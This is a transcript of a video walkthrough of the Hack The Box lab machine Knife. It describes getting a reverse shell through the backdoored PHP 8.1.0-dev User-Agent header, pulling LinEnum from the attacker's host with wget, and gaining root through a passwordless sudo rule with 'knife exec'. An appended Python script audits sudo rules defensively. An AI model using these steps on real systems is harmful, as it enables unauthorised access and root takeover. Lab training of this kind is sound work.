Transcript for:
Hack The Box: Knife Overview

Hey guys, HackerSploit here, back again with another video. Welcome back to the Hack The Box series. In this video we're going to be taking a look at Knife. Knife was recently retired, just a few days ago, and a lot of you have been asking me to cover recently retired boxes. This one was fairly simple; I actually completed it before it was retired. So this is a Linux box, and again, it's not the best that I've come across in terms of initial exploitation, but the thing I like about it is that it doesn't have any CTF-like exploitation challenges set up. So if you're really keen on your enumeration, exploiting or gaining access to this box should be fairly simple.

Right, so let's take a look at the Nmap results here. I'm going to be using the Nmap results that I had from the time when I initially went through this box. You can take a look at the results, and my Nmap scan options right over here; they're fairly simple, and you can see I scanned all TCP ports. Of course the IP is different because it changed. In regards to the services, we have SSH running on port 22; as for the service version, it's OpenSSH 8.2p1, and we get the distribution banner, which tells us it's running Ubuntu. There are no vulnerabilities that you can find for this version of OpenSSH. You then have a web server running on port 80, and that's running Apache httpd 2.4.41. Again, same thing, nothing vulnerable there, and again the distribution or operating system banner is displayed there. As for the web application, you can see that the Nmap http-title script tells us that the title is "Emergent Medical Idea". So if we open up the web server here, paste and go, you can see that it's a fairly simple HTML template, or at least that's what I think it is, and of course trying to access the robots.txt file here doesn't give us anything, but again we get the operating system banner, and it essentially displays the information for us there.

Analyzing the source doesn't reveal much. We can see that it pretty much has internal CSS styling and a bit of inline styling. We also have some JavaScript, but the JavaScript here primarily has to do with this particular terminal effect, which I'm quite familiar with. So, the next logical step now: if we analyze the Nmap scan, we can see we don't have any other ports open, and neither of these two services is inherently vulnerable to any exploits, so it's obvious that the target is the web application. Now the web application looks fairly simple, so the next logical step in terms of web enumeration that you will most likely take is of course to run directory brute forcing or fuzzing to try and find files and directories that could give us an idea of what we need to do. But one step that a lot of people actually miss out is enumerating the technologies that are running on the website or on the web server. So when I talk about the technologies: you can see that we're dealing with a Linux box here, we know it's running Ubuntu, and it has a web server, and that's running Apache, so that gives us an idea of what stack is being used. So we know it's Linux, Apache, no MySQL (but that's primarily because the application doesn't need it), and PHP. So let's try and enumerate a little bit more information about this particular stack.

To do this we can use WhatWeb. WhatWeb is fairly simple to use. Let me just copy the IP here; I can actually just copy the entire URL there. We can just say whatweb and paste in the URL there, and that'll provide us with a list of technologies and their versions that are actually running on the web server. So we can see it's running Apache 2.4.41, we get HTML5, the IP, and we have something very interesting here: we have PHP 8.1.0-dev. That's interesting. And again we also get the X-Powered-By header here, which again points towards PHP 8.1.0-dev. What if we use Nikto? Let's try Nikto; will that provide us with the same information? It does; it actually tells us right over here that it's running PHP 8.1.0-dev. So that's interesting. So what if we actually search for "php 8.1.0 exploit"? Let's see what we can find. Looks like we have an interesting exploit here and a GitHub repository, so let's take a look at that. Let's see what this exploit does, and we can see it's for the exact version: 8.1.0-dev User-Agent remote code execution. We can see that it's been tested on Ubuntu 20.04 and the version 8.1.0-dev, it provides us with the references there, and a readme file, which looks like it is in Chinese, but hey. So it looks like it provides us with a download link for the backdoor, but we'll get into that right now.

So: an early release of PHP, the PHP 8.1.0-dev version, was released with a backdoor on March 28, 2021, so this is fairly recent. The backdoor was quickly discovered and removed. If this version of PHP runs on a server, the following exploit code uses the backdoor to provide a pseudo shell on the host. All right, so this will provide us with a pseudo shell. If we take a look at the GitHub repository here, which is what I used to actually get a reverse shell, you can see it gives you a bit of information regarding the backdoor, which again PHP thankfully provided to us, and of course this gives you an idea of how this works. There are two Python scripts here: one of them is the reverse shell, and the other is the backdoor. The reverse shell will give you a reverse shell, if I can actually say that. So you can see here, reverse shell, and using it is fairly simple: we essentially launch it with python3, provide the target URL, the attacker or your Kali IP, and your Kali port that you're currently listening on, because it's again going to provide us with the reverse shell.

So what we can do is we can actually just get this particular reverse shell Python script. Raw; I'm just going to get it here, and we will save it. Let me just terminate that and clear that out. So let's save it here and paste that in there, and then I'm going to set up a netcat listener, so nc -nvlp 1234; let's set up on port 1234. Let me also get my VPN IP; we can see that that's it right over here. Okay, so that's fine. Let me also copy the IP there. As for the usage, as it says right over here, we run the script with python3, we then provide the target URL, the attacker IP and the attacker port. So we're going to say python3, provide the name of the script (the reverse shell PHP dev .py script), and then we provide the actual URL, which again over here we'll just provide as http. There we are. We then need to provide our Kali IP, 10.10.14.107, and the port 1234, and we hit enter, and immediately we get a reverse shell right over here, and we're logged in as the user james at knife.

So if we head over into our working directory, into our home directory for the user james, you can see we get the user flag, user.txt; we get it there. If we list out all the files in the home directory, we can see that .bash_history actually goes into /dev/null, so that means it's being cleared, or it's not being saved, and we have a few other files here. So we've obtained initial access. If we try to enumerate information regarding the actual operating system or the distribution version, we can see it's Ubuntu 20.04.2 LTS. uname -a: we get the kernel version, which is 5.4.0. Again, we're not performing kernel exploitation; we're going to take a look at another technique, which I'll get to shortly. If we list out the users on the system, /etc/passwd, we can see that we have a user for PostgreSQL; we also have a few others. Let's see: we have the root user, of course we know that, and a few others, but we pretty much have access through a user called james.

So the next step is going to deal with enumeration, and I've pretty much talked of a few tools that you can use whenever you want to perform enumeration, like for example LinPEAS or the Linux Exploit Suggester, but those are primarily for, or in particular the Linux Exploit Suggester is for, exploits, primarily kernel exploits but not limited to that. In this video I want to take you through another tool called LinEnum, which again you should be familiar with. So if I just open this up here, there we are, that's the first link there. We can see that this is simply an enumeration tool for Linux systems, and it essentially displays the following information: user information, privileged access, and it provides us with good breakout binaries available via sudo. So let's actually take a look at how to use this. Again, you can clone it, or you can actually just get the shell script and then transfer it over to your target. I already have it on my system; that's being stored on my desktop here under Linux Enum, and I'll just serve this directory. When I say "serve", I'm simply using the Python module SimpleHTTPServer to set up a local web server in this particular directory to host the file. So again you can see I have LinEnum.sh there, so I'm just going to say serve, provide my password here, and we'll go into the /tmp directory and list all the files in here. Looks like we have a few files, but nothing interesting or nothing useful, if I can say that. Right, so we can then use wget and then provide the Kali IP here, so 10.10.14.107, and we're getting LinEnum.sh. We hit enter, we get that successfully, and we can then terminate or shut down the web server there. We can then use chmod +x LinEnum.sh to make it executable, and then execute it, so LinEnum.sh. I'm just going to let this complete, or go through the enumeration process, so once it's done I'll get back to you and then we can start identifying vulnerabilities that we can use to elevate our privileges.

All right, so LinEnum has completed enumerating information, and we can take a look at the results here. Right from the top, you can see we get the system information, the kernel information, and we also get the distribution release information, as well as the hostname, the current user, the current user ID, the group ID, users that have previously logged onto the system, who else is currently logged on, so on and so forth, and then the group memberships, and we also get the contents of the /etc/passwd file, which we did manually. And we also discovered something interesting here: it says we can sudo without supplying a password. So you might be saying, well, what does that mean? It says "Matching Defaults entries for james on knife", and it provides us here with the actual environment variables, and then it says "User james may run the following commands on knife", so we can essentially run knife without providing a password. So we can say sudo /usr/bin/knife, or just knife. But what exactly does knife do? Well, let's actually try that out, because our environment variable has been configured correctly, so if we say knife, let's see what this binary does. Wow, that's quite a bit of information here. Let's try and find out more about this binary. So how exactly do we go about doing that? We can search for a site called GTFOBins, and that's gtfobins.github.io. So let me explain something here, if you've never heard of this resource. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. Again, as it says, it's important to note that this is not a list of exploits, and the programs listed here are not vulnerable per se; rather, GTFOBins is a compendium about how to live off the land when you only have certain binaries available. So you're essentially just taking advantage of misconfiguration.

So if we search for the knife binary, there we are, we can see it's the first one, so we click on knife. You can see that it doesn't give us much information about it, but we can search for it and see what it's actually used to do. Let's see. All right, so there we are, knife; that's under docs.chef.io. So let's see what this does: knife is a command-line tool that provides an interface between a local chef-repo and the Chef infrastructure. So again, it's used to manage infrastructure like nodes, cookbooks and recipes. Let's see what else it does; I think it actually allows you to work with a few other services, which we actually saw there, but yeah, we get an idea of what it does. So again, GTFOBins essentially lists out binaries and how they can be exploited. It says right over here that knife, if we use the shell, can be used to break out from restricted environments by spawning an interactive system shell. So again, if you're working within a restricted environment with no job control, you can actually use knife to give you a bash or shell session, similar to what you do with Python. So whenever you get a reverse shell and you don't have an interactive environment and you want to spawn a bash session, you will use Python, and that's exactly what's happening here, except if knife is installed on the target you can also get a bash session with knife. And for sudo: if the binary is allowed to be run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

So what that means is we can get an elevated bash session by running this particular command, and because we can run it with root privileges, as it said within LinEnum, that means we can get root privileges almost immediately. So again, if we just scroll to the top here so that I can highlight where it actually displayed that, there we are: we can sudo without supplying a password. So we can actually run the knife binary with sudo privileges without providing the root password, or providing an administrative password. So if we run that, we say sudo knife exec -E 'exec "/bin/sh"', or just /bin/bash, but we can actually just run it like so, and if we type in id, there we are, we have root. So I can get a bash session really easily, and again, there we are, we get a bash session. Again, id, whoami: we are root, and now if I head over into the root directory, list all the files there, cat root.txt, and we get the root flag.

So yeah, that was fairly simple. Again, I wanted to introduce you to GTFOBins; it's a very, very helpful resource whenever you're trying to elevate your privileges or break out of a non-interactive session or reverse shell. So you can see there are quite a few interesting categories based on the actual functionality, or the binaries that can be used to provide you with the functionality. So for example, non-interactive, or let's look at something more interesting: if we talk about SUID binaries, it'll provide you with a list of binaries. For example, let me just click on bash here; well, let's look for an interesting one here like, for example, cat. So again, if the binary has the SUID bit set, it does not drop the elevated privileges and may be used to abuse the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian, et cetera, et cetera, and then it provides you with access as to how you can do that. So again, it's a very, very helpful resource; I definitely recommend checking it out.

And yeah, that's pretty much all that I wanted to cover in this video. This box was fairly simple, but again, enumeration, as you've seen, is key, and understanding how certain binaries can be exploited is also very, very interesting. So let me know what you guys think in the comments section. You can also join us on Discord; we have a Discord server, and the link will be in the description section. You can join in the discussions or the channels for Hack The Box or TryHackMe, and if you have any issues or you'd like to contribute, you can do that there, and we always have great discussions regarding various techniques that can be used for exploitation, enumeration and privilege escalation. So with that being said, thank you very much for watching this video, and I'll be seeing you in the next video.

A huge thank you to all of our patrons; your support is greatly appreciated, and this is a formal thank you. So thank you Shamir Douglas, Ryan Carr, Sandor, Michael Busby, Sits Up Doozy, Defean, Barry, Dustin Umpress and Michael Hubbard. Your support is greatly appreciated, and you keep us making even more high-quality content for you guys. So thank you.
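Added example, not part of the video or any HackerSploit material: the sudoers misconfiguration LinEnum reported ("User james may run the following commands on knife ... NOPASSWD: /usr/bin/knife") is the kind of finding an administrator can audit automatically. The script below parses `sudo -l` output and flags passwordless rules for ALL or for binaries GTFOBins documents as shell-capable; the sample output and the SHELL_CAPABLE set are constructed assumptions.

```python
# Added example (not from the video or HackerSploit): audit `sudo -l` output
# for passwordless rules on shell-capable binaries, the finding LinEnum
# surfaced on Knife. All sample text below is constructed.
import re
from dataclasses import dataclass

# Binaries GTFOBins documents as able to spawn a shell when run via sudo.
# Kept to names the video mentions; extend this set for your own estate.
SHELL_CAPABLE = {"knife", "bash", "sh", "python", "python3"}

# Constructed `sudo -l` output modelled on the LinEnum finding in the video.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/apt-get update
"""

# One rule line looks like "(runas) TAG: TAG: command"; the tags are optional.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str

    @property
    def binary(self) -> str:
        # Basename of the first word of the command spec ("ALL" stays "ALL").
        return self.command.split()[0].rsplit("/", 1)[-1]


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Return the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = m.group("tags").upper()
            rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD" in tags, m.group("cmd")))
    return rules


def risky_rules(rules: list[SudoRule]) -> list[SudoRule]:
    """Passwordless rules for ALL or a shell-capable binary: root in one command."""
    return [r for r in rules if r.nopasswd and (r.command == "ALL" or r.binary in SHELL_CAPABLE)]
```

Run `risky_rules(parse_sudo_l(open("sudo-l.txt").read()))` over captured output from each host; any hit is a rule to replace with a password-required entry or a narrower command.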